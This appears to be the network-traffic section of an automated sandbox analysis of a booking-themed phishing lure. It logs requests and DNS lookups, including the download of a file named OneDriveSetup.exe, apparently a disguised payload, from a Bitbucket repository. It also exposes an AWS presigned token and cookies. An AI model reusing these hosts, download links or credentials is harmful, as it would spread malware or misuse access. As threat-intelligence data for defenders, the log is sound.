                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /?qs=dd02f46a2b01ff14c8b7f5d6eee791994ec9db7224e2b8c6008c3bb428429855c449a2273d72377f007301aae3a4af35ed3799ed1629b547 HTTP/1.1Host: cl.s12.exct.netConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /?qs=dd02f46a2b01ff14c8b7f5d6eee791994ec9db7224e2b8c6008c3bb428429855c449a2273d72377f007301aae3a4af35ed3799ed1629b547 HTTP/1.1Host: cl.s12.exct.netConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=oceanbreeze.&oit=1&cp=12&pgcl=7&gs_rn=42&psi=Ta3SbLoPbtz4sM0f&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /wikipedia/commons/8/87/PDF_file_icon.svg HTTP/1.1Host: upload.wikimedia.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://bookingmanageview.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=oceanbreeze.com&oit=3&cp=15&pgcl=7&gs_rn=42&psi=Ta3SbLoPbtz4sM0f&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /wikipedia/commons/8/87/PDF_file_icon.svg HTTP/1.1Host: upload.wikimedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /buildthefuturewithusholloway/tryandtrytogetbonus/downloads/OneDriveSetup.exe HTTP/1.1Host: bitbucket.orgConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://bookingmanageview.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /buildthefuturewithusholloway/tryandtrytogetbonus/downloads/OneDriveSetup.exe HTTP/1.1Host: bitbucket.orgConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://bookingmanageview.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /7efcf163-7ea0-4026-9851-6a4913a3f3f6/downloads/0b7cd0a7-2609-4f79-b2f4-29338930ef75/OneDriveSetup.exe?response-content-disposition=attachment%3B%20filename%3D%22OneDriveSetup.exe%22&AWSAccessKeyId=ASIA6KOSE3BNOI3AWRXW&Signature=UvJrF4LPfL%2BOBRzTrGtQPwq4JcQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAcaCXVzLWVhc3QtMSJHMEUCIQCGmsPLX0uw72pGadTpC1XFeeKGv0NrYuQPnWqyywCxKQIgEndcid7aMNuaesPseefl3yhGzqp3tu3zifXT8245m9gqpwIIUBAAGgw5ODQ1MjUxMDExNDYiDCMVxvVRMzlGFCK5xCqEAqM27j2pVY4pvbH0tzdiyo4uNRVpeDaZerhmA86UIviEgfS3OEGofnWHJufwLHEKXwGq4qU3xN9aJO7XM3NAiZ8xHgd8P0P7aAKVVOqw0Wc%2Fa6DnLl6rY%2Bm6Y%2FoIid0IxdJkj46sFUUJanfV0bgmH%2F%2ByPaOgbd15eDbfZ4%2FB6B7pZa6XHrO70ujQNR9uvBumywB3NlOoHU%2B3kCz4HLO81G4r9erRK3xkxQ3IG4KjURKVlpEnDa80mbxRKQTgSRsbOr9jR4vocvcAkGreZ2CxtUXIida2snlwCuMK05m9Njwzvm4K%2FB3uVzYoTwnW1tjPfVk21SeIU4AsfGZ3sn0G4ZzrpBHHMILorb4GOp0BWR%2BXPtM3UWQjqz7N5Oep1ydM07IIVzkSpCbuLlYi9eE9kQUt6pj6CKnfG1RgRkbnZGKs6GmYZiYewt7HEwLHTSQQZUi%2FTv2mUA%2Br1PZK%2BYCUlq2fzEAD2sPgi0MSeupREVU2RlmOC6M%2BIFhM8d6wA6c%2Bsw2bJedBLgJmf2LGV28%2BEV8Qu9m1UXXE1BMGdOGsG7FfpqHJagDCyKLkcw%3D%3D&Expires=1741388554 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://bookingmanageview.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /buildthefuturewithusholloway/tryandtrytogetbonus/downloads/OneDriveSetup.exe HTTP/1.1Host: bitbucket.orgConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://bookingmanageview.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: oceanbreeze.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /lander HTTP/1.1Host: oceanbreeze.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://oceanbreeze.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /adsense/domains/caf.js?abp=1&gdabp=true HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*X-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://oceanbreeze.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /v1/domains/domain?domain=oceanbreeze.com&portfolioId=&abp=1&gdabp=true HTTP/1.1Host: api.aws.parking.godaddy.comConnection: keep-aliveX-Request-Id: 1dd7154d-4c1f-4b0d-82f1-1560e1da66fcsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://oceanbreeze.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://oceanbreeze.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /v1/domains/domain?domain=oceanbreeze.com&portfolioId=&abp=1&gdabp=true HTTP/1.1Host: api.aws.parking.godaddy.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: AWSALBCORS=QLMNgBGKEee25WHpdpj/pfohwFxKGFj60aAPG94rtF22I/ZxWmQ3gcx1lSQ3ynoryvZ83Q2LpBhiIPyZfBpj2tOJiYUdIc68PHwRiLly/iUyfOQZgH2wdg/PI+Om; cpvisitor=a6538d19-8b8c-42fa-b74a-feee6c8cd65f
                      Source: global trafficHTTP traffic detected: GET /ad_icons/standard/publisher_icon_image/search.svg?c=%230f1c21 HTTP/1.1Host: afs.googleusercontent.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://syndicatedsearch.goog/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /ad_icons/standard/publisher_icon_image/chevron.svg?c=%230f1c21 HTTP/1.1Host: afs.googleusercontent.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://syndicatedsearch.goog/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /ad_icons/standard/publisher_icon_image/search.svg?c=%230f1c21 HTTP/1.1Host: afs.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*X-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /ad_icons/standard/publisher_icon_image/chevron.svg?c=%230f1c21 HTTP/1.1Host: afs.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*X-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /v1/parkingEvents?abp=1&gdabp=true HTTP/1.1Host: api.aws.parking.godaddy.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cpvisitor=a6538d19-8b8c-42fa-b74a-feee6c8cd65f; AWSALB=Yiw+XuGYjw7bHjztfbLne6Wc07HDy+4hlVemIAQC/XJF20xJ6C+W5JB9E5CFOJ1PLmhmzgsk2Da8j+lij5IiQsQiqdr2a7g4iTLkBvkV1ijB21hG+D4EsA4lC2BM; AWSALBCORS=Yiw+XuGYjw7bHjztfbLne6Wc07HDy+4hlVemIAQC/XJF20xJ6C+W5JB9E5CFOJ1PLmhmzgsk2Da8j+lij5IiQsQiqdr2a7g4iTLkBvkV1ijB21hG+D4EsA4lC2BM
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: onedrive.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://bookingmanageview.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: onedrive.live.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://bookingmanageview.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: onedrive.live.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://bookingmanageview.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /ajax/jQuery/jquery-1.9.1.min.js HTTP/1.1Host: ajax.aspnetcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://www.microsoft.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css HTTP/1.1Host: assets.onestore.msConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://www.microsoft.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /en-us/CMSScripts/script.jsx?k=f65ecb70-094d-0b11-7c9d-7da1bcadfaa7 HTTP/1.1Host: c.s-microsoft.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://www.microsoft.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficDNS traffic detected: DNS query: cl.s12.exct.net
                      Source: global trafficDNS traffic detected: DNS query: skillsyne.us
                      Source: global trafficDNS traffic detected: DNS query: www.google.com
                      Source: global trafficDNS traffic detected: DNS query: bookinginvoiceview.com
                      Source: global trafficDNS traffic detected: DNS query: bookingmanageview.com
                      Source: global trafficDNS traffic detected: DNS query: upload.wikimedia.org
                      Source: global trafficDNS traffic detected: DNS query: oceanbreeze.com
                      Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                      Source: global trafficDNS traffic detected: DNS query: apis.google.com
                      Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                      Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
                      Source: global trafficDNS traffic detected: DNS query: img1.wsimg.com
                      Source: global trafficDNS traffic detected: DNS query: syndicatedsearch.goog
                      Source: global trafficDNS traffic detected: DNS query: api.aws.parking.godaddy.com
                      Source: global trafficDNS traffic detected: DNS query: afs.googleusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: bookinghqsupport.top
                      Source: global trafficDNS traffic detected: DNS query: beacons.gcp.gvt2.com
                      Source: global trafficDNS traffic detected: DNS query: onedrive.com
                      Source: global trafficDNS traffic detected: DNS query: onedrive.live.com
                      Source: global trafficDNS traffic detected: DNS query: beacons.gvt2.com
                      Source: global trafficDNS traffic detected: DNS query: assets.onestore.ms
                      Source: global trafficDNS traffic detected: DNS query: ajax.aspnetcdn.com
                      Source: global trafficDNS traffic detected: DNS query: c.s-microsoft.com
                      Source: global trafficDNS traffic detected: DNS query: beacons2.gvt2.com
                      Source: unknownHTTP traffic detected: POST /report/v4?s=sB8iJCio4Zz%2FbXF2k964ZV39BQuDWTneCKrKKAiuPLko5tFsljyQzVMqJVz0U%2BFJeunEc7Cjt5qdY1g%2FW3eqUJcoaWyHRWFlLuQo%2FlddAxwfHXeIzz7B1PXDcYyv3fCVD6FoZEGvSPg%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 512Content-Type: application/reports+jsonOrigin: https://bookingmanageview.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
